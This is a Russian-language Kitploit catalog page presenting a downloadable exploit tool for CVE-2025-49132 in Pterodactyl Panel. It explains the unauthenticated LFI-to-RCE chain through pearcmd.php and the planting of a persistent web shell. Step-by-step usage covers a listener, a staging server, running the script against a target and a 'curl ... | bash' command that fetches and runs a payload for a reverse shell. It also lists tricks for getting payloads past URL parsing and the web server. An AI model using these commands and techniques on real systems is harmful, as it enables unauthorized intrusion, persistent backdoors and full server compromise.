Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-49132-Mods — Автоматический эксплойт для CVE-2025-49132 — критической неаутентифицированной RCE в Pterodactyl Panel. Использует LFI через locale-эндпоинт для развертывания постоянных веб-шеллов и получения доступа к reverse shell. | Kitploit
Инструменты/GitHubGitHub/malw0re/cve-2025-49132-mods
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubmalw0re/cve-2025-49132-mods

CVE-2025-49132-Mods

Автоматический эксплойт для CVE-2025-49132 — критической неаутентифицированной RCE в Pterodactyl Panel. Использует LFI через locale-эндпоинт для развертывания постоянных веб-шеллов и получения доступа к reverse shell.

Репозиторий
122496 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-49132 - RCE Simple

Python CVE

📝 Обзор

Этот репозиторий содержит специализированный эксплойт для CVE-2025-49132, критической уязвимости удалённого выполнения кода (RCE) без аутентификации в Pterodactyl Panel (до версии v1.11.11).

Уязвимость существует в конечной точке /locales/locale.json. Манипулируя параметрами запроса locale и namespace, атакующий может использовать Local File Inclusion (LFI) для взаимодействия с pearcmd.php. Это позволяет создавать произвольные файлы и выполнять команды, что приводит к полному компрометации системы.

⚙️ Цепочка эксплойта

Скрипт ape.py автоматизирует следующие шаги:

  • Обнаружение PEAR: Перебирает структуру каталогов для поиска установки PEAR на целевом устройстве.
  • Создание бэкдора: Использует config-create из PEAR для записи постоянного веб-шелла в /tmp/shell.php.

🚀 Инструкция по использованию

Чтобы добиться успешного обратного вызова на цели, следуйте этому порядку действий:

  1. Подготовка Слушатель: Запустите Penelope (или предпочитаемый вами слушатель) в отдельном терминале:

penelope -p 4444

Промежуточный сервер: Если используется пользовательский shell-скрипт, разместите его через Python: python3 -m http.server 8080

  1. Выполнение Запустите скрипт в интерактивном режиме, чтобы сохранить контроль над процессом эксплуатации:

python3 ape.py --host xxx.xxx.xxx --interactive

  1. Перехват шелла Внутри приглашения shell> используйте следующую команду для выполнения вашей промежуточной нагрузки:

shell> curl http://<YOUR_IP>:8080/shell.sh | bash

🛡️ Технические меры защиты

  • Обход пробелов: Автоматически использует ${IFS} для того, чтобы полезные нагрузки пережили разбор URL.
  • Обёртка Base64: Оборачивает команды обратного шелла в Base64, чтобы предотвратить искажение символов Nginx/веб-сервером цели.
  • Обработка тайм-аута: Предназначена для определения момента успешного подключения обратного шелла, даже если веб-запрос зависает.
Скачать инструмент